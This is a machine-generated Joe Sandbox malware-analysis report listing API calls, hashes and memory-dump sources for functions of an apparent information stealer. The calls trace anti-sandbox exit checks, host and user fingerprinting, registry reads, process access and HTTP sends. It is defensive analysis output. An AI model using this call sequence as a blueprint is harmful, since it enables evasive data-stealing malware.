                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3466090806-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                  • RegOpenKeyExA.ADVAPI32(80000002,02D423F0,00000000,00020119,004176B9), ref: 0041775B
                                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: CurrentBuildNumber
                                                  • API String ID: 3466090806-1022791448
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                  APIs
                                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID: :A$:A
                                                  • API String ID: 1378416451-1974578005
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02F075A1
                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02F07618
                                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02F07674
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02F076B9
                                                  • HeapFree.KERNEL32(00000000), ref: 02F076C0
                                                    • Part of subcall function 02F094A7: vsprintf_s.MSVCRT ref: 02F094C2
                                                  • task.LIBCPMTD ref: 02F077BC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                  • String ID:
                                                  • API String ID: 700816787-0
                                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction ID: b9c05b93c751882f74cc7d4fe435316d12aff572b5ac1b9fe2f7a6d577f80735
                                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction Fuzzy Hash: 35611BB5D0026C9BDB24DB50CC94FE9B7B9BF48384F0081E9E649A6180DBB06BC5DF94
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02F06548
                                                    • Part of subcall function 02F064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 02F0656A
                                                    • Part of subcall function 02F064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F0659C
                                                    • Part of subcall function 02F064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F065EC
                                                    • Part of subcall function 02F064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02F06626
                                                    • Part of subcall function 02F064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02F06638
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02F1557F
                                                  • lstrlen.KERNEL32(00000000), ref: 02F15596
                                                    • Part of subcall function 02F19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02F190B9
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 02F155CB
                                                  • lstrlen.KERNEL32(00000000), ref: 02F155EA
                                                  • strtok.MSVCRT(00000000,?), ref: 02F15605
                                                  • lstrlen.KERNEL32(00000000), ref: 02F15615
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID:
                                                  • API String ID: 3532888709-0
                                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction ID: 65249cd022fdd633bc4d6f2e72065f1c25f1be018be3bd394612f6b49cb658fc
                                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction Fuzzy Hash: 4651D771911248EBCB28FFA0CE95AED7B76AF50780FD04018EA0A665D0EF346B45CF51
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02F17345
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,02F17574,004205BD), ref: 02F17383
                                                  • memset.MSVCRT ref: 02F173D1
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02F17525
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID:
                                                  • API String ID: 224852652-0
                                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction ID: 933cae83100c2c9c5db6c6be84008c75136fd3bee4f2ae2bc32b00540d1add56
                                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction Fuzzy Hash: F75170B1D00218DFDB14EBA0DD85BEDF775AF44345F9041A9E309A7281EB746A84CF58
                                                  APIs
                                                  • memset.MSVCRT ref: 02F1433C
                                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 02F1435B
                                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 02F1437F
                                                  • RegCloseKey.ADVAPI32(?), ref: 02F14389
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F143AE
                                                  • lstrcat.KERNEL32(?,0064A168), ref: 02F143C2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction ID: 7c88c496ec1e9b580d7bb557027431736937022b8eb8cfbe74c0c830a1a85093
                                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction Fuzzy Hash: 834194B6940108BBDB18EBE0DC85FEE737AAB89300F40455CA719571C0EA756688CFE1
                                                  APIs
                                                  • memset.MSVCRT ref: 004140D5
                                                  • RegOpenKeyExA.ADVAPI32(80000001,02D49C90,00000000,00020119,?), ref: 004140F4
                                                  • RegQueryValueExA.ADVAPI32(?,02D49608,00000000,00000000,00000000,000000FF), ref: 00414118
                                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                  • lstrcatA.KERNEL32(?,02D494D0), ref: 0041415B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00413588
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • strtok_s.MSVCRT ref: 004136D1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                  • String ID:
                                                  • API String ID: 3184129880-0
                                                  • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                  • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                  APIs
                                                  • __lock.LIBCMT ref: 0041B39A
                                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2005412495-0
                                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                  APIs
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02F19B08
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02F19B21
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02F19B39
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02F19B51
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02F19B6A
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02F19B82
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02F19B9A
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02F19BB3
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02F19BCB
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02F19BE3
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02F19BFC
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02F19C14
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02F19C2C
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02F19C45
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F01437: ExitProcess.KERNEL32 ref: 02F01478
                                                    • Part of subcall function 02F013C7: GetSystemInfo.KERNEL32(?), ref: 02F013D1
                                                    • Part of subcall function 02F013C7: ExitProcess.KERNEL32 ref: 02F013E5
                                                    • Part of subcall function 02F01377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02F01392
                                                    • Part of subcall function 02F01377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02F01399
                                                    • Part of subcall function 02F01377: ExitProcess.KERNEL32 ref: 02F013AA
                                                    • Part of subcall function 02F01487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02F014A5
                                                    • Part of subcall function 02F01487: __aulldiv.LIBCMT ref: 02F014BF
                                                    • Part of subcall function 02F01487: __aulldiv.LIBCMT ref: 02F014CD
                                                    • Part of subcall function 02F01487: ExitProcess.KERNEL32 ref: 02F014FB
                                                    • Part of subcall function 02F169D7: GetUserDefaultLangID.KERNEL32 ref: 02F169DB
                                                    • Part of subcall function 02F013F7: ExitProcess.KERNEL32 ref: 02F0142D
                                                    • Part of subcall function 02F17AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02F0141E), ref: 02F17AE7
                                                    • Part of subcall function 02F17AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02F17AEE
                                                    • Part of subcall function 02F17AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02F17B06
                                                    • Part of subcall function 02F17B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F17B77
                                                    • Part of subcall function 02F17B47: RtlAllocateHeap.NTDLL(00000000), ref: 02F17B7E
                                                    • Part of subcall function 02F17B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02F17B96
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F16D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F16D60
                                                  • Sleep.KERNEL32(00001770), ref: 02F16D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D81
                                                  • ExitProcess.KERNEL32 ref: 02F16D89
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2525456742-0
                                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction ID: 3e84563756217a1831a8b714e09561fe85e4ebfad7b93ca3b2a58a708a041800
                                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction Fuzzy Hash: FE314575A40208ABDB08FBF0DC55BFEB77AAF14780F901518A306A20D0EF749A04CE62
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                  • LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                  • CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction ID: 9197280f91d92a9e20250f8e7226c2bc3771851b0047ae3198cee2c7a4eb1e95
                                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction Fuzzy Hash: 3E3105B8E40209EFDB14CF94C884BAE77B5EB48744F108158EA16AB2D0D774AA41CFA1
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                  • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                  APIs
                                                  • __getptd.LIBCMT ref: 02F1CC51
                                                    • Part of subcall function 02F1C206: __getptd_noexit.LIBCMT ref: 02F1C209
                                                    • Part of subcall function 02F1C206: __amsg_exit.LIBCMT ref: 02F1C216
                                                  • __amsg_exit.LIBCMT ref: 02F1CC71
                                                  • __lock.LIBCMT ref: 02F1CC81
                                                  • InterlockedDecrement.KERNEL32(?), ref: 02F1CC9E
                                                  • free.MSVCRT ref: 02F1CCB1
                                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 02F1CCC9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction ID: a46953dca59fd677bec50bafc131468164c7be0fc63b6e50918b85c97775616f
                                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction Fuzzy Hash: DC010032E81BA5EBC721AB65984475C7760BF007D4FC40117DE10A72A0CB246841DFDA
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C9EA
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                                  • __lock.LIBCMT ref: 0041CA1A
                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                  • free.MSVCRT ref: 0041CA4A
                                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
